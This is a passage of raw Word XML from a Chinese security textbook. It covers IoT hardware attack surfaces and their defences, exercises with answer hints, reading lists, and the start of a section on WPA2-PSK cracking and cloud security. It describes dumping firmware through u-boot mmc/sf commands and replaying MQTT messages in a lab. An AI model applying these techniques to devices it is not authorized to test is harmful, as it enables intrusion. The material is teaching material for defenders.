        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">锁死未经授权的物理调试通道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">确保无线/有线通信的新鲜性与认证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。对应的纵深防御措施包括：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">安全启动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">固件签名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：阻止非授权固件运行，即使存储体被替换。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">出厂禁用调试接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：烧断</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> JTAG/SWD/UART </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">熔丝，或设计为认证后才使能。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防重放协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：所有敏感操作启用时间戳/Nonce</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + HMAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS/DTLS。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">物理防篡改与最小化日志输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：降低信息泄露与旁路攻击风险。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">定期渗透测试与模糊测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MPInspector </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等自动化工具审计协议栈实现，弥补开发阶段的疏忽（参考</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OWASP IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">测试指南）。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="379"/>
    <w:bookmarkStart w:id="380" w:name="提取题-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1216"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为什么攻击者即使碰到被加密的固件镜像，仍可能提取出有用的凭据信息？提示：思考静态存储的加密密钥位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1216"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设备的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UART </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调试口，即使在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Boot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后不提供</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell，还能通过什么环节获得固件读写能力？提示：引导加载程序。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1216"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重放攻击与中间人攻击（MitM）的本质区别是什么？为何即使使用了加密也可能遭受重放？试举一例说明。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示与解答要点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">固件加密的密钥若被硬编码在同一设备的早期引导阶段或前一级未加密存储中，攻击者读取未加密部分即可获得密钥，进而解密固件。因此，密钥必须使用硬件安全模块（HSE）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> eFuse </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">存储。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> u-boot </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等引导加载程序的中断进入命令行，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mmc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sf</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等命令直接读写闪存，从而转储或替换固件镜像，完全绕过操作系统的访问控制。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. MitM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是攻击者实时介入并可能篡改通信；重放只需事后重发，不要求实时中间人地位。加密保证机密性，但若不设计防重放机制（如序列号），相同的密文重放后仍会被解密并执行为有效指令——如固定码车库遥控器，即使跳码不够新鲜，重放旧码也可能成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：读者可在自己的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NodeMCU/ESP32 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开发板上编写一个简单的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MQTT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">控制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> LED </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">程序，故意不添加</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Nonce，然后使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark + MQTTBox </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重放消息，验证攻击效果。再参考</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MQTT 5.0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的“会话过期”与“消息</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">expiry”特性升级协议，阻止重放。此任务将在第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 22 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> capstone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的综合靶场中与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">漏洞联动重现。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="380"/>
    <w:bookmarkStart w:id="381" w:name="小结-25"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">小结</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节从物理访问与本地无线通信两个维度，剖析了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设备的三大硬件级攻击面：固件提取、UART</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">调试口利用与重放攻击。三者都直指“设备自身存储不可读、调试口已被禁用、无线指令不可被重放”这些常被错误假设的底线。通过授权环境下的通用实验，读者应能理解并验证这些攻击的可行性，并牢固建立起对应的防御序列：安全启动、固件加密、禁用调试口、防重放协议设计。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="381"/>
    <w:bookmarkStart w:id="382" w:name="延伸阅读白名单-11"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">延伸阅读（白名单）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP IoT Top 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（开放网络应用安全项目</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">十大风险），重点关注</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">I1（弱、可猜测或硬编码密码）、I4（缺乏安全的更新机制）、I7（不安全的数据传输与存储）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NIST SP 800-53/800-57</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（美国国家标准技术研究院安全控制与密钥管理），提供防重放规范与系统安全基线。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CIS Benchmarks for IoT Devices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（互联网安全中心</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IoT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">设备基线），提供加固检查清单。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK for ICS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（工控</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ATT&amp;CK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">矩阵），覆盖对设备固件、调试接口和重放攻击的技战术映射。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Bejtlich, 《The Practice of Network Security Monitoring》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，为防御者理解如何从网络流量中检测重放与异常通信提供方法论。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Sanders, 《Practical Packet Analysis》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，帮助读者掌握用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">分析和识别重放流量。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Georgia Weidman, 《Penetration Testing: A Hands-On Introduction to Hacking》</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章嵌入式系统渗透测试部分可作为硬件安全入门补充。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1217"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 29–31 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">章</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：重温</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MQTT/CoAP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议帧结构与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> OTA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">更新安全基础，以构建端到端的攻防逻辑。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="382"/>
    <w:bookmarkStart w:id="383" w:name="无线与云安全概览习题小结延伸"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">21.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无线与云安全概览·习题·小结·延伸</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">前置依赖框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无线安全部分依赖《从位到物联》第24–25章对Wi-Fi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">MAC层与802.11帧结构的讲解，以及本书第19章中对网络流量检测的基本思路；学员需理解AP（Access</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Point，无线接入点）与STA（Station，客户端）的关联过程。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">云安全部分无前置硬件依赖，但建议回顾《从位到物联》第28章关于防火墙与ACL的原理，以理解云中虚拟网络控制。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节为概念与习题收束节，不涉及靶机实操；但学员可将后续习题中的迁移任务在自有隔离Wi-Fi环境（仅限自有设备）或云沙箱中完成。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">授权与隔离声明框（强制）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节所讨论的无线抓包与离线口令猜测技术，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">仅限于读者对自身拥有的、完全处于隔离实验环境中的Wi-Fi网络进行操作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。在任何情况下，未经明确书面授权，针对他人无线网络的侦听、抓包、破解行为均属违法。云安全案例分析中涉及的错配示例，仅用于教学理解，不得在未经授权的云环境中执行探测。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在上一节中，我们目睹了攻击者如何通过物理接触与近场通信，打破“设备自身不可被非法访问”的底层信任假设；本节将视角从物理硬件拉向更广阔的开放空间与虚拟化基础设施。无线网络的安全性与有线网络存在根本差异：信号通过开放空间传播，物理边界不可控，数据帧可被任何在无线电范围内的设备接收。云安全则颠覆了传统硬件边界，将资产完全置于第三方基础设施之上。两种技术虽然形态迥异，却共享一个安全本质——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">信任边界发生了迁移，而防护措施必须随之重新定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。这一本质与上一节中IoT硬件安全的结论一脉相承：在无线安全中，信任边界从物理线缆迁移到了开放空间；在云安全中，信任边界从自建机房迁移到了第三方基础设施。本节从第一性原理出发，剖析无线安全中最具代表性的WPA2-PSK破解机理，并建立云安全责任共担与常见错配的整体认知框架，最后以习题收束三个专题的防御思想。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">无线安全：WPA2四次握手与离线PSK破解的原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对于攻击者而言，无线环境是一个无需物理接入即可达成窃听的媒介。802.11数据帧在空间中以电磁波形式存在，使用廉价适配器设为监听模式（monitor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">mode）即可捕获任何信道的帧，无论是否关联到目标AP。防御者的难题在于，如何在不安全的传输介质上建立保密性和完整性。WPA2（Wi-Fi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Protected Access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2）使用四次握手（4-Way</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Handshake）完成对STA和AP的相互认证，并衍生出会话密钥。这一握手过程本身正是攻击与防御的焦点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从原理直觉[简化]而言，四次握手相当于一个“在公开场合对暗号”的过程：AP和STA都已经知道一个公共口令（PSK，Pre-Shared</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
